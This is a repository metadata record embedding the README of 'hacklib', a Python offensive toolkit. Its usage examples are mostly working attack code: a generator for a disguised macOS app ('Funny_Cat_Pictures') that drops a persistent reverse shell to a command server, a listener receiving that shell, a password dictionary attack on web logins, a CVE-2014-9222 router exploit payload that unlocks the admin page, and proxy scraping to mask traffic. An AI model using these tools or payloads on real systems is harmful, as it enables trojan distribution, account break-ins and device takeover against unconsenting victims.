{"id":21582654,"url":"https://github.com/lazorfuzz/python-hacklib","last_synced_at":"2026-06-08T20:16:48.858Z","repository":{"id":62568878,"uuid":"59861142","full_name":"lazorfuzz/python-hacklib","owner":"lazorfuzz","description":"hacklib - pentesting, port scanning, and logging in anywhere with Python","archived":false,"fork":false,"pushed_at":"2019-08-26T07:09:39.000Z","size":73,"stargazers_count":99,"open_issues_count":4,"forks_count":31,"subscribers_count":16,"default_branch":"master","last_synced_at":"2026-01-13T16:34:24.815Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lazorfuzz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-05-27T20:21:29.000Z","updated_at":"2025-12-26T19:36:04.000Z","dependencies_parsed_at":"2022-11-03T16:47:01.431Z","dependency_job_id":null,"html_url":"https://github.com/lazorfuzz/python-hacklib","commit_stats":null,"previous_names":["leonli96/python-hacklib"],"tags_count":7,"template":false,"template_full_name":null,"purl":"pkg:github/lazorfuzz/python-hacklib","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lazorfuzz%2Fpython-hacklib","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lazorfuzz%2Fpython-hacklib/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lazorfuzz%2Fpython-hacklib/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lazorfuzz%2Fpython-hacklib/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lazorfuzz","download_url":"https://codeload.github.com/lazorfuzz/python-hacklib/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lazorfuzz%2Fpython-hacklib/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":34078926,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-06-08T02:00:07.615Z","response_time":111,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-24T14:16:28.380Z","updated_at":"2026-06-08T20:16:48.837Z","avatar_url":"https://github.com/lazorfuzz.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# hacklib\n![MIT License](https://img.shields.io/github/license/mashape/apistatus.svg)\n[![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/)\n##### Toolkit for hacking enthusiasts using Python.\nhacklib is a Python module for hacking enthusiasts interested in network security. It is no longer in active development.\n\n\n#### Installation\nTo get hacklib, simply run in command line:\n```console\npip install hacklib\n```\n\n\nhacklib also has a user interface. To use it, you can do one of the following:\n\nDownload hacklib.py and run in console:\n```console\npython hacklib.py\n----------------------------------------------\nHey. What can I do you for?\n\n\nEnter the number corresponding to your choice.\n\n1) Connect to a proxy\n2) Target an IP or URL\n3) Lan Scan\n4) Create Backdoor\n5) Server\n6) Exit\n\n```\nOr if you got it using pip:\n\n```python\nimport hacklib\nhacklib.userInterface()\n```\n\n\n#### Usage Examples\nReverse shell backdooring (Currently only for Macs):\n```python\nimport hacklib\n\nbd = hacklib.Backdoor()\n# Generates an app that, when ran, drops a persistent reverse shell into the system.\nbd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')\n# Takes the IP and port of the command server, the OS of the target, and the name of the .app\n```\nGenerated App:\n\n![Screenshot](http://i.imgur.com/BsBzCWA.png)\n\nListen for connections with Server:\n```python\n\u003e\u003e\u003e import hacklib\n\u003e\u003e\u003e s = hacklib.Server(9090) # Bind server to port 9090\n\u003e\u003e\u003e s.listen() \nNew connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)\nbash: no job control in this shell\nbash$ whoami # Type a command\nleon\nbash$ # Nice!\n```\n\nUniversal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:\n\n```python\nimport hacklib\n\nac = hacklib.AuthClient()\n# Logging into a gmail account\nhtmldata = ac.login('https://gmail.com', 'email', 'password')\n\n# Check for a string in the resulting page\nif 'Inbox' in htmldata: print 'Login Success.'\nelse: print 'Login Failed.'\n\n# For logins using HTTP Basic Auth:\ntry: \n    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')\nexcept: pass #login failed\n```\nSimple dictionary attack using AuthClient:\n```python\nimport hacklib\n\nac = hacklib.AuthClient()\n# Get the top 100 most common passwords\npasswords = hacklib.topPasswords(100)\n\nfor p in passwords:\n    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)\n    if htmldata and 'welcome' in htmldata.lower():\n        print 'Password is', p\n        break\n```\n\nPort Scanning:\n```python\nfrom hacklib import *\n\nps = PortScanner()\nps.scan(getIP('yourwebsite.com'))\n# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default\n\n# After a scan, open ports are saved within ps for reference\nif ps.portOpen(80):\n    # Establish a TCP stream and sends a message\n    send(getIP('yourwebsite.com'), 80, message='GET / HTTP/1.0\\r\\n\\r\\n')\n```\n\nMisfortune Cookie Exploit (CVE-2014-9222) using PortScanner:\n```python\n\u003e\u003e\u003e import hacklib\n\n# Discovery\n\u003e\u003e\u003e ps = hacklib.PortScanner()\n\u003e\u003e\u003e ps.scan('192.168.1.1', (80, 81))\nPort 80:\nHTTP/1.1 200\nContent-Type: text/html\nTransfer-Encoding: chunked\nServer: RomPager/4.07 UPnP/1.0\nEXT:\n# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.\n\n# Exploitation\n\u003e\u003e\u003e payload = '''GET / HTTP/1.0\\r\\n\nHost: 192.168.1.1\nUser-Agent: googlebot\nAccept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8\nAccept-Language: en-US, en; q=0.5\nAccept-Encoding: gzip, deflate\nCookie: C107351277=BBBBBBBBBBBBBBBBBBBB\\x00''' + '\\r\\n\\r\\n'\n\u003e\u003e\u003e hacklib.send('192.168.1.1', 80, payload)\n# The cookie replaced the firmware's memory allocation for web authentication with a null bye.\n# The router's admin page is now fully accessible from any web browser.\n```\n\nFTP authentication:\n```python\nimport hacklib\nftp = hacklib.FTPAuth('127.0.0.1', 21)\ntry:\n    ftp.login('username', 'password')\nexcept:\n    print 'Login failed.'\n```\n\nSocks4/5 proxy scraping and tunneling\n```python\n\u003e\u003e\u003e import hacklib\n\u003e\u003e\u003e import urllib2\n\u003e\u003e\u003e proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet\n\u003e\u003e\u003e proxy = hacklib.Proxy()\n\u003e\u003e\u003e proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist\n\u003e\u003e\u003e proxy.IP\nu'41.203.214.58'\n\u003e\u003e\u003e proxy.port\n65000\n\u003e\u003e\u003e proxy.country\nu'KE'\n# All Python network activity across all modules are routed through the proxy:\n\u003e\u003e\u003e urllib2.urlopen('http://icanhazip.com/').read() \n'41.203.214.58\\n'\n# Notes: Only network activity via Python are masked by the proxy.\n# Network activity on other programs such as your webbrowser remain unmasked.\n# To filter proxies by country and type:\n# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')\n```\n\nWord Mangling:\n\n```python\nfrom hacklib import *\n\nword = Mangle(\"Test\", 0, 10, 1990, 2016)\n\nword.Leet()\nword.Numbers()\nword.Years()\n```\nOutput:\n\n```\nT3$t\nTest0\n0Test\n...snip...\nTest10\n10Test\nTest1990\n1990Test\n...snip...\nTest2016\n2016Test\n```\n\nPattern Create:\n\n```python\nfrom hacklib import *\n\nPattern = PatternCreate(100)\n\nPattern.generate()\n```\nOutput:\n\n```\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A\n```\n\nPattern Offset:\n\n```python\nfrom hacklib import *\n\nOffset = PatternOffset(\"6Ab7\")\n\nOffset.find()\n```\nOutput:\n\n```python\n[+] Offset: 50\n```\n\n#### Dependencies\nNot all classes have external dependencies, but just in case you can do the following:\n```python\nhacklib.installDependencies()\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flazorfuzz%2Fpython-hacklib","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flazorfuzz%2Fpython-hacklib","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flazorfuzz%2Fpython-hacklib/lists"}